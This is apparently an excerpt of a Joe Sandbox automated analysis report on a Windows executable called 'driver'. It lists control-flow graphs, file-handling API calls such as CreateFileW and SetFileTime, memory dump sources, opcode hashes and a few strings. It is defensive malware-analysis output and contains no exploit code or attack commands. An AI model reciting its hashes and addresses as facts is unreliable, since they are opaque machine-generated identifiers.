                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1091 42dfe4-42dfe8 1092 42dfed-42dff5 1091->1092 1092->1092 1093 42dff7-42e00f 1092->1093 1094 42e011-42e025 call 43bd68 1093->1094 1095 42e027-42e02e 1093->1095 1094->1095 1097 42e030-42e032 call 42db84 1094->1097 1095->1097 1098 42e037-42e044 call 401df4 1095->1098 1097->1098 1103 42e046-42e057 call 43bbc4 1098->1103 1104 42e05a-42e072 call 43bd6d 1098->1104 1103->1104 1109 42e121-42e12b call 42e47c 1104->1109 1110 42e078-42e0d5 call 401150 call 401300 call 412b88 call 41559c * 3 1104->1110 1114 42e130-42e13e 1109->1114 1230 42e0ea-42e0f6 call 412c48 1110->1230 1116 42e144-42e14a 1114->1116 1117 42e45b-42e45d call 42db84 1114->1117 1116->1117 1119 42e452-42e459 call 433310 1116->1119 1120 42e202-42e24a call 422e54 call 4229fc call 4029a4 call 430c28 call 421b00 1116->1120 1121 42e2d0-42e2db 1116->1121 1122 42e25b-42e264 1116->1122 1123 42e428-42e43b call 430bcc call 430c7c 1116->1123 1124 42e418-42e426 call 427950 1116->1124 1125 42e24f-42e256 call 427c40 1116->1125 1126 42e18d-42e198 1116->1126 1140 42e462-42e469 1117->1140 1119->1140 1120->1140 1129 42e2fa-42e2fd 1121->1129 1130 42e2dd 1121->1130 1135 42e266-42e269 1122->1135 1136 42e277-42e27e 1122->1136 1178 42e440-42e450 call 430c28 1123->1178 1124->1140 1125->1140 1138 42e1a1-42e1ac 1126->1138 1139 42e19a 1126->1139 1150 42e309-42e326 call 42e564 call 427950 1129->1150 1151 42e2ff-42e302 1129->1151 1148 42e2e3-42e2e6 1130->1148 1149 42e3f6-42e404 call 427894 call 427268 1130->1149 1153 42e2a0-42e2a7 call 428564 1135->1153 1154 42e26b-42e26e 1135->1154 1155 42e280-42e291 call 43bca0 1136->1155 1156 42e294-42e29b call 427950 1136->1156 1157 42e1b5-42e1fd call 422e54 call 422eb8 call 4029a4 call 430c28 call 421b00 1138->1157 1158 42e1ae 1138->1158 1139->1138 1146 42e476-42e47a 1140->1146 1147 42e46b-42e470 call 42bb7c 1140->1147 1183 42e475 1147->1183 1167 42e406-42e40d call 42ad1c 1148->1167 1168 42e2ec-42e2ef 1148->1168 1149->1140 1150->1140 1170 42e304 1151->1170 1171 42e32b-42e35d call 42e564 call 42e488 1151->1171 1153->1140 1173 42e270-42e273 1154->1173 1174 42e2b8-42e2bf call 427950 1154->1174 1155->1156 1156->1140 1157->1140 1158->1157 1167->1140 1184 42e2f5 1168->1184 1185 42e39d-42e3b7 call 42e488 1168->1185 1187 42e40f-42e416 call 42db84 1170->1187 1171->1140 1223 42e363-42e398 call 413610 call 413690 call 413644 1171->1223 1190 42e275-42e2cb call 42db84 1173->1190 1191 42e2ac-42e2b3 call 428ac0 1173->1191 1174->1140 1178->1140 1183->1146 1184->1187 1185->1140 1220 42e3bd-42e3f4 call 413610 call 413e64 call 413644 1185->1220 1187->1140 1190->1140 1191->1140 1220->1140 1223->1140 1241 42e0fb-42e0fd 1230->1241 1245 42e0d7-42e0e5 call 42e47c 1241->1245 1246 42e0ff-42e11f call 412c08 call 4011a8 1241->1246 1245->1230 1246->1114
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: .rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                    • API String ID: 0-2937467848
                                                                                                                                                                    • Opcode ID: fd50a2a627dff247e91d3d55ad6010fb9c5ea3a39d25a8d5f6dcb06cf043ce75
                                                                                                                                                                    • Instruction ID: 904711155ef7155550cf87014a88549011424ec4c30a920a999190eb42bf5f5a
                                                                                                                                                                    • Opcode Fuzzy Hash: fd50a2a627dff247e91d3d55ad6010fb9c5ea3a39d25a8d5f6dcb06cf043ce75
                                                                                                                                                                    • Instruction Fuzzy Hash: C5A1C630704124D6DB10FA36DC867E973696F44308F9495FFA80996287DB7C9E8E8E1D
                                                                                                                                                                    Function 00404128 Relevance: 4.6, APIs: 3, Instructions: 131filetimeCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1255 404128-404143 call 40c794 1258 404296-40429c 1255->1258 1259 404149-40414d 1255->1259 1260 40415f-404161 1259->1260 1261 40414f-40415d 1259->1261 1263 404168-40416f 1260->1263 1261->1260 1262 404163 1261->1262 1262->1263 1264 404181-404183 1263->1264 1265 404171-40417f 1263->1265 1267 40418a-404191 1264->1267 1265->1264 1266 404185 1265->1266 1266->1267 1268 4041a3-4041a5 1267->1268 1269 404193-4041a1 1267->1269 1271 4041ac-4041be call 4046f4 1268->1271 1269->1268 1270 4041a7 1269->1270 1270->1271 1274 4041c0-4041c6 1271->1274 1275 4041c8-4041ca 1271->1275 1274->1275 1276 4041cc 1274->1276 1277 4041d1-4041d8 1275->1277 1276->1277 1278 4041e6-404219 call 402fe8 CreateFileW 1277->1278 1279 4041da-4041e1 call 404720 1277->1279 1278->1258 1283 40421b-40421f 1278->1283 1279->1278 1284 404221-404227 call 41564c 1283->1284 1285 40422c-404230 1283->1285 1284->1285 1287 404232-404238 call 41564c 1285->1287 1288 40423d-404241 1285->1288 1287->1288 1289 404243-404249 call 41564c 1288->1289 1290 40424e-404252 1288->1290 1289->1290 1293 404254-404257 1290->1293 1294 404259 1290->1294 1295 40425b-404260 1293->1295 1294->1295 1296 404262-404265 1295->1296 1297 404267 1295->1297 1298 404269-40426e 1296->1298 1297->1298 1299 404270-404273 1298->1299 1300 404275 1298->1300 1301 404277-404288 SetFileTime CloseHandle 1299->1301 1300->1301 1301->1258 1302 40428a-404291 call 404720 1301->1302 1302->1258
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C794: GetVersionExA.KERNEL32(?), ref: 0040C7B7
                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 0040420F
                                                                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00404279
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 0040427F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseCreateHandleTimeVersion
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2096772557-0
                                                                                                                                                                    • Opcode ID: 17cdb9a66299e2c1012d6f42ea9f2ec9d0652cb06febbfdb5b769e94be17a63f
                                                                                                                                                                    • Instruction ID: f96e439989b8a20514a120498ea30dc6308d0899c77b210d4eb5f6a6b45ac3f7
                                                                                                                                                                    • Opcode Fuzzy Hash: 17cdb9a66299e2c1012d6f42ea9f2ec9d0652cb06febbfdb5b769e94be17a63f
                                                                                                                                                                    • Instruction Fuzzy Hash: F54121B0B00208AAEB14D668C8897EEB7A19FC0344F1481BEE9007B2C1D77C5FC5CB98
                                                                                                                                                                    Function 00403234 Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1304 403234-403253 1305 403255 1304->1305 1306 403257-403260 1304->1306 1305->1306 1307 403262 1306->1307 1308 403268-403271 1306->1308 1307->1308 1309 403273 1308->1309 1310 403277-40327d 1308->1310 1309->1310 1311 403284-40328e call 40c794 1310->1311 1312 40327f 1310->1312 1315 403290-403292 1311->1315 1316 4032b1-4032c6 CreateFileA 1311->1316 1312->1311 1315->1316 1318 403294-403298 1315->1318 1317 4032c8-4032cb 1316->1317 1320 4032e1-4032fe 1317->1320 1321 4032cd-4032d5 GetLastError 1317->1321 1318->1316 1319 40329a-4032af CreateFileW 1318->1319 1319->1317 1323 403300-403305 1320->1323 1324 40334f-403358 1320->1324 1321->1320 1322 4032d7 1321->1322 1322->1320 1325 403316 1323->1325 1326 403307-403314 call 40bd80 1323->1326 1328 40331f-403323 1325->1328 1326->1328 1330 403325-403334 call 43bca0 1328->1330 1331 403336-403340 call 40bb5c 1328->1331 1334 403345-40334a call 403480 1330->1334 1331->1334 1334->1324
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,?,00000000,00000003,?,00000000,?,004521B1,?), ref: 004032A8
                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,?,00000000,?,004521B1,?), ref: 004032C1
                                                                                                                                                                      • Part of subcall function 0040BB5C: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,01000000,00000000,00000000,00000000,?,00403345,?,80000000,?,00000000,00000003), ref: 0040BB6F
                                                                                                                                                                    • GetLastError.KERNEL32(?,80000000,?,00000000,00000003,?,00000000,?,004521B1,?), ref: 004032CD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile$ByteCharErrorLastMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 158210224-0
                                                                                                                                                                    • Opcode ID: b586c681ecaf5f70aebd6a51d080ccf90e8db8989ef33fb17bc03818a034da51
                                                                                                                                                                    • Instruction ID: c0eb25f7e837c625ff599399f0f4410ed9f0b55084f256b897961968ceba47b4
                                                                                                                                                                    • Opcode Fuzzy Hash: b586c681ecaf5f70aebd6a51d080ccf90e8db8989ef33fb17bc03818a034da51
                                                                                                                                                                    • Instruction Fuzzy Hash: 46310431D04244AAEB219F69C885B9E7F699F41715F1881FEEC003B3C6CB798B44D7A8
                                                                                                                                                                    Function 0040392C Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1337 40392c-40393d 1338 403956-403968 ReadFile 1337->1338 1339 40393f-403945 1337->1339 1342 4039a6 1338->1342 1343 40396a-403973 call 403cbc 1338->1343 1340 403947 1339->1340 1341 40394c-403953 GetStdHandle 1339->1341 1340->1341 1341->1338 1344 4039a9-4039ae 1342->1344 1347 403975-40397b 1343->1347 1348 40398d-403991 1343->1348 1347->1348 1349 40397d-40398b call 40392c 1347->1349 1350 4039a1-4039a4 1348->1350 1351 403993-40399b GetLastError 1348->1351 1349->1344 1350->1344 1351->1350 1353 40399d-40399f 1351->1353 1353->1344
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000050,00448C48,?,00000050,?,0040387A,?,?,?), ref: 0040394E
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000050,?,00000000,00000050,00448C48,?,00000050,?,0040387A,?,?,?), ref: 00403961
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000050,?,00000000,00000050,00448C48,?,00000050,?,0040387A,?,?,?), ref: 00403993
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileHandleLastRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1699850967-0
                                                                                                                                                                    • Opcode ID: f0c4213db934efaf1b7c57c3a46049db619d8b559a74e8eef21bac415a508b50
                                                                                                                                                                    • Instruction ID: 793a8c2b7c9f7cd6f86bb99b3fd821f70d1e6f7ccbde508a1cd23e6d6f86bbf6
                                                                                                                                                                    • Opcode Fuzzy Hash: f0c4213db934efaf1b7c57c3a46049db619d8b559a74e8eef21bac415a508b50
                                                                                                                                                                    • Instruction Fuzzy Hash: 1F01FCB1A04104A6EB105E669D4196BAE5CEB80337F10427BE914FA2C2D6FCCE0046EE
                                                                                                                                                                    Function 00403EF8 Relevance: 4.5, APIs: 3, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1355 403ef8-403f08 call 40c794 1358 403f0a-403f0c 1355->1358 1359 403f1e-403f21 CreateDirectoryA 1355->1359 1358->1359 1360 403f0e-403f12 1358->1360 1361 403f26-403f28 1359->1361 1360->1359 1362 403f14-403f1c CreateDirectoryW 1360->1362 1363 403f39-403f41 GetLastError 1361->1363 1364 403f2a-403f37 call 404720 1361->1364 1362->1361 1365 403f43-403f46 1363->1365 1366 403f48-403f4d 1363->1366 1369 403f54-403f57 1364->1369 1365->1366 1368 403f4f 1365->1368 1366->1369 1368->1369
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C794: GetVersionExA.KERNEL32(?), ref: 0040C7B7
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00451DB0,?,00000000,00402070), ref: 00403F17
                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,00451DB0,?,00000000,00402070), ref: 00403F21
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00451DB0,?,00000000,00402070), ref: 00403F39
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateDirectory$ErrorLastVersion
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4238167203-0
                                                                                                                                                                    • Opcode ID: 76f32588672b3048aa7793aa7daac87b937ab50e5bfa775c30cfa0a8958bd6d0
                                                                                                                                                                    • Instruction ID: fbc29b1eb2c98ec279b0ef2c1586bddcf8cea435a2d0fa28653ddf3cd3d586dd
                                                                                                                                                                    • Opcode Fuzzy Hash: 76f32588672b3048aa7793aa7daac87b937ab50e5bfa775c30cfa0a8958bd6d0
                                                                                                                                                                    • Instruction Fuzzy Hash: DBF08220B0421352EA302E6B2C8276B48AE8F95B53F140077F905F72C1DAFCCE42412E
                                                                                                                                                                    Function 0043B52C Relevance: 3.9, Strings: 3, Instructions: 156COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 0kD$0kD$0kD
                                                                                                                                                                    • API String ID: 0-252212622
                                                                                                                                                                    • Opcode ID: a9d81a556e43f36948903a17bc235fcb5ecbfc820efbacf9e37d11236316dc9d
                                                                                                                                                                    • Instruction ID: ccff8610ce7c4afd8eb52111e42a3da9c059fa4699dc43e23f600b751f8a500c
                                                                                                                                                                    • Opcode Fuzzy Hash: a9d81a556e43f36948903a17bc235fcb5ecbfc820efbacf9e37d11236316dc9d
                                                                                                                                                                    • Instruction Fuzzy Hash: 745174B56001508FC315CF18D9D1A15BBA1FB4A324B29D36ED5198F3E6D735EC81CB8A
                                                                                                                                                                    Function 00441568 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,023720A0,000000FF), ref: 00441598
                                                                                                                                                                    Strings
                                                                                                                                                                    • Out of memory in _setargv0, xrefs: 00441580
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                    • String ID: Out of memory in _setargv0
                                                                                                                                                                    • API String ID: 514040917-2942948061
                                                                                                                                                                    • Opcode ID: 129c879392923774ff2a07c093cd71962e6daef3155abbc6be6e0babe1aa431a
                                                                                                                                                                    • Instruction ID: 6b8ac712215fb229eb92c572ce924ded29fbd285f6b841b12e85132c835207be
                                                                                                                                                                    • Opcode Fuzzy Hash: 129c879392923774ff2a07c093cd71962e6daef3155abbc6be6e0babe1aa431a
                                                                                                                                                                    • Instruction Fuzzy Hash: 7CD09E71385B016AFA407BEA6882B292258A719B19F10007FF604895D1DDE55990562D
                                                                                                                                                                    Function 004033B0 Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000000,00000000,?,004521B1,?,00000000,?,0042B7EF,00000001,00000001,00000000), ref: 004033F6
                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000000,00000000,?,004521B1,?,00000000,?,0042B7EF,00000001,00000001,00000000), ref: 00403411
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                    • Opcode ID: 1d0d5b27ff3aeff15ee5b50c66216ca40360bc728b70c83e950a6f1d80c6af85
                                                                                                                                                                    • Instruction ID: 0011c9e4c2c0fa370232780aa7686f39da00e5595a68883fe1eae08a60c3d1e3
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d0d5b27ff3aeff15ee5b50c66216ca40360bc728b70c83e950a6f1d80c6af85
                                                                                                                                                                    • Instruction Fuzzy Hash: BE21C531600300AAEB259F258C82B56BE989F44715F14C17AFE04AF2C6E7BCDA4583AD
                                                                                                                                                                    Function 004039E8 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000,00000000,?,?,?,004039C8,?,?,00000000,?,?,004038C0,?), ref: 00403A48
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,?,?,004039C8,?,?,00000000,?,?,004038C0,?), ref: 00403A52
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: 4accbd1c46337688f908d4e155e27962c9e9569d7876c0e4b845c701a28acf00
                                                                                                                                                                    • Instruction ID: f5810df8bb3031b3672b44123f7d8264be7168b40d28e95d8826f55270b85d52
                                                                                                                                                                    • Opcode Fuzzy Hash: 4accbd1c46337688f908d4e155e27962c9e9569d7876c0e4b845c701a28acf00
                                                                                                                                                                    • Instruction Fuzzy Hash: 04018E31604204AFDB109E2988405AA7F9CAB04336F10C23BFC55AA2C1D278DF409E99
                                                                                                                                                                    Function 00403A68 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,?,00000001,00000000,00000000,?,?,00403758,?,?,00000000,?,00000000,?,00000000), ref: 00403A80
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000001,00000000,00000000,?,?,00403758,?,?,00000000,?,00000000,?,00000000), ref: 00403A8C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                    • Opcode ID: 11376d7a33d08bc2bfa767998202ab47ade2a2b017e6dd4751b90cc36154d971
